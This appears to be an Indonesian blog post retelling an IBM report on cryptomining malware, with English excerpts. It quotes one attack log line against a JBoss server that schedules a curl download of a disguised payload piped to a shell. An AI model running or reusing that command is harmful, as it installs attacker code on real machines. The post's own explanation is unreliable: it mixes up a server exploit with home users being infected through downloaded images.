KOMPUTER LAPTOP ANDA DIPAKAI MINING TANPA DISADARI?

0
0

IBM mengeluarkan laporan yang cukup mengagetkan karena komputer atau laptop rumahan anda bisa dipakai untuk mining uang digital atau cryptocurrencies.

Tidak hanya dapat dipakai untuk mining  tetapi komputer atau laptop rumahan anda ini bisa dipakai juga menjadi node untuk verifikasi transaksi. Jumlah yang terlibat dalam konfigurasi ini sangat banyak dan IBM memperkirakan bisa mencapai 6 kali lipat.

According to IBM Managed Security Services (MSS) data, there have been peaks reaching more than a sixfold increase in attacks involving embedded mining tools in the eight-month period between January and August 2017.

Laptop atau komputer anda akan menjadi perangkat mining sesudah diinjeksi oleh semacam program malware.

Kemudian tentu saja, Laptop atau komputer anda tidak mudah untuk disadari sudah menjadi perangkat mining karena cara injeksi dilakukan dengan sangat halus.

Pertama kali injeksi dilakukan bisa dari kunjungan anda ke situs tertentu yang biasanya terkait berita seni dan entertainment bahkan juga terkait information dan communication technology.

Salah satu cara menyerang komputer atau laptop anda ini bernama JBoss application server.

For this example, we’ll focus on an attack targeting a JBoss application server.

Attack Context:

URL=/jexws4/jexws4.jsp,arg=ppp=echo+%22%2A%2F33+%2A+%2A+%2A+%2A+curl+http://xx.xxx.xx.xxx/themes/logo.jpg|sh

The URL path above indicates a JavaScript file that is not native to JBoss software: jexws4.jsp is a component of the JexBoss exploit tool. JexBoss is a tool for testing and exploiting Java deserialization vulnerabilities in JBoss application servers. If JexBoss is resident on the target machine, it would indicate that the server is compromised and will allow shell commands to be executed.

Prinsip dari penyerangan dengan cara JBoss application server ini pada prinsipnya ketika anda berkunjung ke suatu situs, komputer anda akan mengunduh semua informasi pada halaman tersebut termasuk informasi untuk mengunduh suatu gambar.

Ketika laptop atau komputer anda mengunduh gambar tersebut maka sebetulnya ada program yang sedang anda unduh untuk kemudian anda eksekusi.

Sewaktu di-eksekusi maka laptop atau komputer rumahan anda sudah menjadi alat mining. Sangat efisien dan ringkas.

Bagaimana cara menghentikannya?

Ada banyak pilihan tetapi prinsipnya tidak sederhana. Anda harus melakukan banyak pencegahan.

Creating a one-stop shopping solution for preventing miners from being executed in your environment is almost impossible because so many variables exist. Focus on your network specifics and take every precaution to identify and lock down the applicable entry points of malware and miners alike.

Situs dari sumber berita ini memberikan pilihan bagi anda untuk melakukan pencegahan, detailnya akan sangat panjang.

Beberapa pilihan diantaranya:

  • merubah patch keamanan;
  • mengganti default security credentials;
  • membuat white list bagi aplikasi anda sendiri;
  • menghindari injection attacks (hindari situs berbahaya).

Berita dan gambar diambil dari situs Security Intelligence.